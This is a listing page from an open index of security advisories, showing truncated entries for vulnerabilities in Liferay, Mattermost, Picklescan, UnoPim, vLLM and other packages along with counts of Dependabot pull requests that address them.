Data

Tools

Indexes

Applications

Experiments

Dependabot

An open index of dependabot pull requests across open source projects.

Security Advisories

Browse security advisories and track which Dependabot PRs address them.

RSS Feed

24,785

Total Advisories

1,792

With Dependabot PRs

3,506

Critical Severity

8,617

High Severity

Clear All Filters
Liferay Portal vulnerable to Stored XSS in Components portlet
GHSA-rvmf-jw8g-r35r CVE-2025-43769 MODERATE 3 months ago
Stored cross-site scripting (XSS) vulnerability in Liferay Portal 7.4.0 through 7.4.3.131, and Liferay DXP 2024.Q3.1 through 2024.Q3.8, 2024.Q2.0 t...
maven
No PRs yet
Liferay Portal vulnerable to Reflected XSS with the referer and forward parameter
GHSA-h4m4-xp33-37mj CVE-2025-43770 MODERATE 3 months ago
A reflected cross-site scripting (XSS) vulnerability in the Liferay Portal 7.4.0 through 7.4.3.131, and Liferay DXP 2024.Q4.0 through 2024.Q4.3, 20...
maven
No PRs yet
Liferay Portal users can upload an unlimited amount of files
GHSA-84pp-qr92-95c9 CVE-2025-43762 MODERATE 3 months ago
Liferay Portal 7.4.0 through 7.4.3.132, and Liferay DXP 2025.Q1.0 through 2025.Q1.1, 2024.Q4.0 through 2024.Q4.7, 2024.Q3.1 through 2024.Q3.13, 202...
maven
No PRs yet
Liferay Portal's unauthenticated users can access loaded files via URL before submitting the object entry
GHSA-mm62-gwj5-j285 CVE-2025-43758 MODERATE 3 months ago
Liferay Portal 7.4.0 through 7.4.3.132, and Liferay DXP 2025.Q1.0 through 2025.Q1.5, 2024.Q4.0 through 2024.Q4.7, 2024.Q3.1 through 2024.Q3.13, 202...
maven
No PRs yet
Liferay Portal Reflected XSS in CKeditor 4.21.0 endpoint
GHSA-3h7r-4xxj-3mfm CVE-2025-43761 MODERATE 3 months ago
A reflected cross-site scripting (XSS) vulnerability in the Liferay Portal 7.4.0 through 7.4.3.131, and Liferay DXP 2024.Q4.0 through 2024.Q4.4, 20...
maven npm
No PRs yet
Liferay Portal users are able to add system admin portlets to pages
GHSA-w3cr-3xw2-rp78 CVE-2025-43759 MODERATE 3 months ago
Liferay Portal 7.4.0 through 7.4.3.132, and Liferay DXP 2025.Q1.0, 2024.Q4.0 through 2024.Q4.7, 2024.Q3.0 through 2024.Q3.13, 2024.Q2.0 through 202...
maven
No PRs yet
gnark is vulnerable to signature malleability in EdDSA and ECDSA due to missing scalar checks
GHSA-95v9-hv42-pwrj CVE-2025-57801 HIGH 3 months ago
In version before, `sig.s` used without asserting `0 ≤ S < order` in `Verify function` in [eddsa.go](https://github.com/Consensys/gnark/blob/d9a423...
go
No PRs yet
Liferay Portal Reflected Cross-Site Scripting Vulnerability via PortalUtil.escapeRedirect
GHSA-fvqv-593q-qp8r CVE-2025-43760 MODERATE 3 months ago
A reflected cross-site scripting (XSS) vulnerability in the Liferay Portal 7.4.0 through 7.4.3.132, and Liferay DXP 2025.Q1.0 through 2025.Q1.4, 20...
maven
No PRs yet
Liferay Portal User Enumeration Vulnerability via the Create Account Page
GHSA-xwc5-q44v-p6gg CVE-2025-43751 MODERATE 3 months ago
User enumeration vulnerability in Liferay Portal 7.4.0 through 7.4.3.132, and Liferay DXP 2024.Q4.0 through 2024.Q4.7, 2024.Q3.0 through 2024.Q3.13...
maven
No PRs yet
Rust XCB `xcb::Connection::connect_to_fd*` functions violate I/O safety
GHSA-655h-hg88-5qmf LOW 3 months ago
The API of `xcb::Connection` has constructors which allow an arbitrary `RawFd` to be used as a socket connection. On either failure of these constr...
cargo
No PRs yet
Picklescan missing detection when calling pytorch function torch.utils._config_module.load_config
GHSA-vv6j-3g6g-2pvj MODERATE 3 months ago
### Summary Using torch.utils._config_module.load_config function, which is a pytorch library function to execute remote pickle file. ### Details...
pypi
No PRs yet
Picklescan missing detection when calling pytorch function torch.jit.unsupported_tensor_ops.execWrapper
GHSA-vr7h-p6mm-wpmh MODERATE 3 months ago
### Summary Using torch.jit.unsupported_tensor_ops.execWrapper function, which is a pytorch library function to execute remote pickle file. ### D...
pypi
No PRs yet
Picklescan missing detection when calling pytorch function torch.utils.data.datapipes.utils.decoder.basichandlers
GHSA-h3qp-7fh3-f8h4 MODERATE 3 months ago
### Summary Using torch.utils.data.datapipes.utils.decoder.basichandlers function, which is a pytorch library function to execute remote pickle fi...
pypi
No PRs yet
Picklescan missing detection when calling pytorch function torch.utils.collect_env.run
GHSA-f745-w6jp-hpxx MODERATE 3 months ago
### Summary Using torch.utils.collect_env.run function, which is a pytorch library function to execute remote pickle file. ### Details The attac...
pypi
No PRs yet
Picklescan missing detection when calling pytorch function torch.fx.experimental.symbolic_shapes.ShapeEnv.evaluate_guards_expression
GHSA-f4x7-rfwp-v3xw MODERATE 3 months ago
### Summary Using torch.fx.experimental.symbolic_shapes.ShapeEnv.evaluate_guards_expression function, which is a pytorch library function to execu...
pypi
No PRs yet
Picklescan missing detection when calling pytorch function torch._dynamo.guards.GuardBuilder.get
GHSA-86cj-95qr-2p4f MODERATE 3 months ago
### Summary Using torch._dynamo.guards.GuardBuilder.get function, which is a pytorch library function to execute remote pickle file. ### Details ...
pypi
No PRs yet
Picklescan missing detection when calling pytorch function torch.utils.bottleneck.__main__.run_cprofile
GHSA-4r9r-ch6f-vxmx MODERATE 3 months ago
### Summary Using torch.utils.bottleneck.__main__.run_cprofile function, which is a pytorch library function to execute remote pickle file. ### ...
pypi
No PRs yet
UnoPim has CSV Injection on Quick Export feature
GHSA-74rg-6f92-g6wx CVE-2025-55745 LOW 3 months ago
### Summary Description: `CSV Injection` or `Formula Injection` is a security vulnerability that occurs when malicious content is inserted into a C...
packagist
No PRs yet
UnoPim has Broken Access Control
GHSA-8p2f-fx4q-75cx CVE-2025-55741 HIGH 3 months ago
### Summary In Unopim, it is possible to create roles and choose the privileges. However, users without the “Delete” privilege for Products cannot ...
packagist
No PRs yet
Dpanel has an arbitrary file read vulnerability
GHSA-gcqf-pxgg-gw8q CVE-2025-53363 MODERATE 3 months ago
### Summary Dpanel has an arbitrary file read vulnerability in the /api/app/compose/get-from-uri interface.Logged in to Dpanel ,this interface can ...
go
No PRs yet
JeecgBoot SQL Injection Vulnerability
GHSA-gj8w-ffq9-6828 CVE-2025-51825 MODERATE 3 months ago
JeecgBoot versions from 3.4.3 up to 3.8.0 were found to contain a SQL injection vulnerability in the /jeecg-boot/online/cgreport/head/parseSql endp...
maven
No PRs yet
Bouncy Castle for Java has Out-of-Bounds Write Vulnerability
GHSA-g6rx-6wfx-gj74 CVE-2025-9340 LOW 3 months ago
Out-of-bounds Write vulnerability in Legion of the Bouncy Castle Inc. Bouncy Castle for Java bc-fips on All (API modules). This vulnerability is as...
maven
No PRs yet
Bouncy Castle for Java has Uncontrolled Resource Consumption Vulnerability
GHSA-jfcv-jv9g-2vx2 CVE-2025-9341 MODERATE 3 months ago
Uncontrolled Resource Consumption vulnerability in Legion of the Bouncy Castle Inc. Bouncy Castle for Java FIPS bc-fips on All (API modules) allows...
maven
No PRs yet
Liferay Portal's Unlimited File Upload Could Result in DoS
GHSA-qpp6-f3qj-rggq CVE-2025-43752 MODERATE 3 months ago
Liferay Portal 7.4.0 through 7.4.3.132, and Liferay DXP 2025.Q1.0 through 2025.Q1.4, 2024.Q4.0 through 2024.Q4.7, 2024.Q3.1 through 2024.Q3.13, 202...
maven
No PRs yet
Liferay Portal Reflected Cross-Site Scripting Vulnerability via Form Container
GHSA-r367-q549-pgr5 CVE-2025-43753 LOW 3 months ago
A reflected cross-site scripting (XSS) vulnerability in the Liferay Portal 7.4.3.32 through 7.4.3.132, and Liferay DXP 2025.Q1.0 through 2025.Q1.7,...
maven
No PRs yet
hippo4j Includes Hard Coded Secret Key in JWT Creation
GHSA-48cg-9c55-j2q7 CVE-2025-51606 HIGH 3 months ago
hippo4j 1.0.0 to 1.5.0, uses a hard-coded secret key in its JWT (JSON Web Token) creation. This allows attackers with access to the source code or ...
maven
No PRs yet
Denial-of-Service attack in pyLoad CNL Blueprint using dukpy.evaljs
GHSA-9gjj-6gj7-c4wj CVE-2025-57751 HIGH 3 months ago
Dear Maintainers, I am writing to you on behalf of the Tencent AI Sec. We have identified a potential vulnerability in one of your products and wou...
pypi
No PRs yet
Mattermost has Potential Server Crash due to Unvalidated Import Data
GHSA-h469-4fcf-p23h CVE-2025-8402 MODERATE 3 months ago
Mattermost versions 10.8.x <= 10.8.3, 10.5.x <= 10.5.8, 9.11.x <= 9.11.17, 10.10.x <= 10.10.0, 10.9.x <= 10.9.3 fail to validate import data which ...
go
No PRs yet
Liferay Portal Username Enumeration Vulnerability
GHSA-x7p4-v8mj-6fxx CVE-2025-43754 MODERATE 3 months ago
Username enumeration vulnerability in Liferay Portal 7.4.0 through 7.4.3.132, and Liferay DXP 2024.Q4.0 through 2024.Q4.7, 2024.Q3.0 through 2024.Q...
maven
No PRs yet
Mattermost Fails to Sanitize File Names
GHSA-pj6f-rc94-gw53 CVE-2025-6465 MODERATE 3 months ago
Mattermost versions 10.8.x <= 10.8.3, 10.5.x <= 10.5.8, 10.10.x <= 10.10.0, 10.9.x <= 10.9.3 fail to sanitize file names which allows users with fi...
go
No PRs yet
Liferay Portal Reflected Cross-Site Scripting Vulnerability via snippet Parameter
GHSA-q2gv-w583-f2vq CVE-2025-43756 MODERATE 3 months ago
A reflected cross-site scripting (XSS) vulnerability in the Liferay Portal 7.4.3.132, and Liferay DXP 2025.Q1.0 through 2025.Q1.15, 2025.Q2.0 throu...
maven
No PRs yet
Liferay Portal Stored Cross-Site Scripting Vulnerability via GroupPagesPortlet_type Parameter
GHSA-58cq-8wm2-6m87 CVE-2025-43755 MODERATE 3 months ago
A Stored cross-site scripting vulnerability in the Liferay Portal 7.4.0 t through 7.4.3.132, and Liferay DXP 2025.Q2.0, 2025.Q1.0 through 2025.Q1.1...
maven
No PRs yet
@musistudio/claude-code-router has improper CORS configuration
GHSA-8hmm-4crw-vm2c CVE-2025-57755 HIGH 3 months ago
### Impact Due to improper Cross-Origin Resource Sharing (CORS) configuration, there is a risk that user API Keys or equivalent credentials may be ...
npm
No PRs yet
vite-plugin-static-copy files not included in `src` are possible to access with a crafted request
GHSA-pp7p-q8fx-2968 CVE-2025-57753 MODERATE 3 months ago
### Summary Files not included in `src` was possible to access with a crafted request. ### Impact Only apps explicitly exposing the Vite dev ser...
npm
4
Dependabot PRs
sha.js is missing type checks leading to hash rewind and passing on crafted data
GHSA-95m3-7q98-8xr5 CVE-2025-9288 CRITICAL 3 months ago
### Summary This is the same as [GHSA-cpq7-6gpm-g9rc](https://github.com/browserify/cipher-base/security/advisories/GHSA-cpq7-6gpm-g9rc) but just ...
npm
3
Dependabot PRs
cipher-base is missing type checks, leading to hash rewind and passing on crafted data
GHSA-cpq7-6gpm-g9rc CVE-2025-9287 CRITICAL 3 months ago
### Summary This affects e.g. `create-hash` (and `crypto-browserify`), so I'll describe the issue against that package Also affects `create-hmac` ...
npm
No PRs yet
vLLM has remote code execution vulnerability in the tool call parser for Qwen3-Coder
GHSA-79j6-g2m3-jgfw CVE-2025-9141 HIGH 3 months ago
### Summary An unsafe deserialization vulnerability allows any authenticated user to execute arbitrary code on the server if they are able to get t...
pypi
No PRs yet
go-viper's mapstructure May Leak Sensitive Information in Logs When Processing Malformed Data
GHSA-2464-8j7c-4cjm MODERATE 3 months ago
### Summary Use of this library in a security-critical context may result in leaking sensitive information, if used to process sensitive fields. ...
go
No PRs yet
UnoPim vulnerable to CSRF on Product edit feature and creation of other types
GHSA-287x-6r2h-f9mw CVE-2025-55744 MODERATE 3 months ago
### Summary Some of the endpoints of the application is vulnerable to Cross site Request forgery (CSRF). | Method | Endpoint | Status | Reason | ...
packagist
No PRs yet
UnoPim vulnerable to remote code execution through Arbitrary File upload
GHSA-v22v-xwh7-2vrm CVE-2025-55743 HIGH 3 months ago
### Summary: Affected Functionality: **Image upload at User creation** Endpoint: `/admin/settings/users/create` ### Details The image upload at th...
packagist
No PRs yet
UnoPim has Stored Cross-site Scripting vulnerability in user creation functionality
GHSA-xr97-25v7-hc2q CVE-2025-55742 MODERATE 3 months ago
### Summary Affected Functionality: User creation Endpoint: `/admin/settings/users/create` ### Details https://github.com/unopim/unopim/blob/a0dc8...
packagist
No PRs yet
vllm API endpoints vulnerable to Denial of Service Attacks
GHSA-rxc4-3w6r-4v47 CVE-2025-48956 HIGH 3 months ago
### Summary A Denial of Service (DoS) vulnerability can be triggered by sending a single HTTP GET request with an extremely large header to an HTTP...
pypi
No PRs yet
Mattermost Fails to Sanitize Path Traversal Sequences
GHSA-x67c-v8jr-p29r CVE-2025-8023 MODERATE 3 months ago
Mattermost versions 10.8.x <= 10.8.3, 10.5.x <= 10.5.8, 9.11.x <= 9.11.17, 10.9.x <= 10.9.2 fails to sanitize path traversal sequences in template ...
go
No PRs yet
Mattermost Server SSRF Vulnerability via the Agents Plugin
GHSA-vqwh-5jhh-vc9p CVE-2025-47700 LOW 3 months ago
Mattermost Server versions 10.5.x <= 10.5.9 utilizing the Agents plugin fail to reject empty request bodies which allows users to trick users into ...
go
No PRs yet
Mattermost Fails to Properly Validate Team Role Modification
GHSA-4276-cm8c-788h CVE-2025-53971 LOW 3 months ago
Mattermost versions 10.5.x <= 10.5.8, 9.11.x <= 9.11.17 fail to properly validate authorization for team scheme role modifications which allows Tea...
go
No PRs yet
Mattermost Does Not Sanitize the Team Invite ID
GHSA-qj47-w9f2-qg44 CVE-2025-47870 MODERATE 3 months ago
Mattermost versions 10.8.x <= 10.8.3, 10.5.x <= 10.5.8, 9.11.x <= 9.11.17, 10.9.x <= 10.9.2 fail to sanitize the team invite ID in the POST /api/v...
go
No PRs yet
Mattermost Lack of Access Control Validation
GHSA-pwvr-grqg-7vp2 CVE-2025-49810 LOW 3 months ago
Mattermost versions 10.5.x <= 10.5.8 fail to validate access controls at time of access which allows user to read a thread via AI posts
go
No PRs yet
Mattermost Fails to Validate Remote Cluster Upload Sessions
GHSA-q453-638c-h4mr CVE-2025-49222 MODERATE 3 months ago
Mattermost versions 10.8.x <= 10.8.3, 10.5.x <= 10.5.8, 9.11.x <= 9.11.17, 10.9.x <= 10.9.2, 10.10.x <= 10.10.0 fail to validate upload types in re...
go
No PRs yet
Mattermost Fails to Validate File Paths
GHSA-gq3r-5833-5532 CVE-2025-36530 MODERATE 3 months ago
Mattermost versions 10.9.x <= 10.9.1, 10.8.x <= 10.8.3, 10.5.x <= 10.5.8, 9.11.x <= 9.11.17 fail to properly validate file paths during plugin impo...
go
No PRs yet
wong2 mcp-cli Command Injection Vulnerability
GHSA-p6rm-483j-37jf CVE-2025-9262 LOW 3 months ago
A flaw has been found in wong2 mcp-cli 1.13.0. Affected is the function redirectToAuthorization of the file /src/oauth/provider.js of the component...
npm
No PRs yet